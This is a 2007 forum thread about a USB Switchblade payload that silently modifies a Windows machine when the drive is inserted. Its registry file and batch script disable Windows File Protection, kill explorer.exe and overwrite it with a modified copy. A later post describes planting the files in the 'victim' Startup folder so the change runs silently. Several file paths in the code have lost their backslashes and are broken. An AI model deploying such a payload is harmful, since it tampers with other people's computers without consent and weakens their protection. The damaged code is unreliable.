The USB Switchblade Hak5 Button

AndyzBong · January 7, 2007

I decided to add code to my USB Switchblade that once inserted into a USB drive it would change the Start button into a Hak5 button.

NOTE: This code does not work well with Portqry.exe (the self port scan program with the USB Switchblade). The Portqry.exe process hangs and once you kill the process, the code will continue.

MAKE A BACKUP OF YOUR EXPLORER.EXE FILE BEFORE EVEN READING FURTHER!

You will need 4 things (these all go in WIPCMD):

1. A registry file to import a key that disables Windows File Protection

2. A modified version of explorer.exe

3. A batch file to delay time when copying the modified explorer

4. A copy of Pskill

First you must create a .reg file for disabling the Windows File Protection System and for disabling the prompt for Pskill. I decided to name this file wfpskill.reg and it includes the following registry keys:

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]

"SFCDisable"=dword:000001



[HKEY_CURRENT_USERSoftwareSysinternalsPsKill]

"EulaAccepted"=dword:00000001

Next you copy and paste explorer.exe into your WIPCMD folder and use ResHack to modify it's start button to whatever you want. Save the changes to explorer.exe Then create a batch file named blank.bat and a batch file named explorer.bat

Blank.bat will be blank (duh), and explorer.bat will have the following code:

@echo off

regedit.exe /s WIPCMDwfpskill.reg

pskill.exe explorer.exe

RENAME C:WINDOWSsystem32dllcacheexplorer.exe explorer.bak

COPY /y F:WIPCMDexplorer.exe C:WINDOWSsystem32dllcache

TYPE NUL | F:WIPCMDblank.bat /N /CY /TY,5 &gt;NUL

COPY /y F:WIPCMDexplorer.exe C:WINDOWS

C:WINDOWSexplorer.exe

exit

Explorer.bat will disable the Windows File Protection System, kill the explorer process, rename the backup of explorer to explorer.bak, copy the modified explorer over, and restart the modified explorer process. Then simply call explorer.bat from the go.cmd script and you're good to go.

This is for educational purposes only, as I read root-ftw's post entitled "ownage" and this is very similar and could be used with other ResHack projects. I am not responsible for any OS injuries.

Mad props to KarmikTrance.

remkow · January 7, 2007

You can also give the file another name, like explorer2.exe, and then change that in the registry (not sure where it was anymore), so you wont have to disable the windows file protection.

Also, maybe you can add some more info on how to edit the explorer.exe file, for those who never did it before.

For the rest, it's really nice, I'm gonna include something like this in my payload :D

AndyzBong · January 8, 2007

In-order to modify explorer.exe you need a copy of ResHack (http://www.angusj.com/resourcehacker/).

The "Start" button resource is located in String Table : 38 : 1033. Simply edit the copy of explorer.exe in your WIPCMD folder and save the changes.

NOTE: If you are going to add the code I mentioned in the above post to your go.cmd payload, make sure that you add it as the last program to run. Since the code kills the explorer.exe process; it is NOT silent. I have decided to modify my own code and copy the essential files to the 'victim' Startup folder, so that the Start button modification takes place upon the next reboot, and the Switchblade can run silently.

Changing the Start Button

(http://www.overclockersclub.com/guides/xpstartbutton.php)

Disabling Windows File Protection

(http://www.microsoft.com/whdc/archive/wfp.mspx#ENAAC)

PsKill

(http://www.microsoft.com/technet/sysintern...ads/PsKill.mspx)

Detailing Windows Explorer with ResHack

(http://wint.virtualplastic.net/showtweak.php?tweak_id=56)

Detailing Windows Explorer with ResHack #2

(http://wint.virtualplastic.net/showtweak.php?tweak_id=75)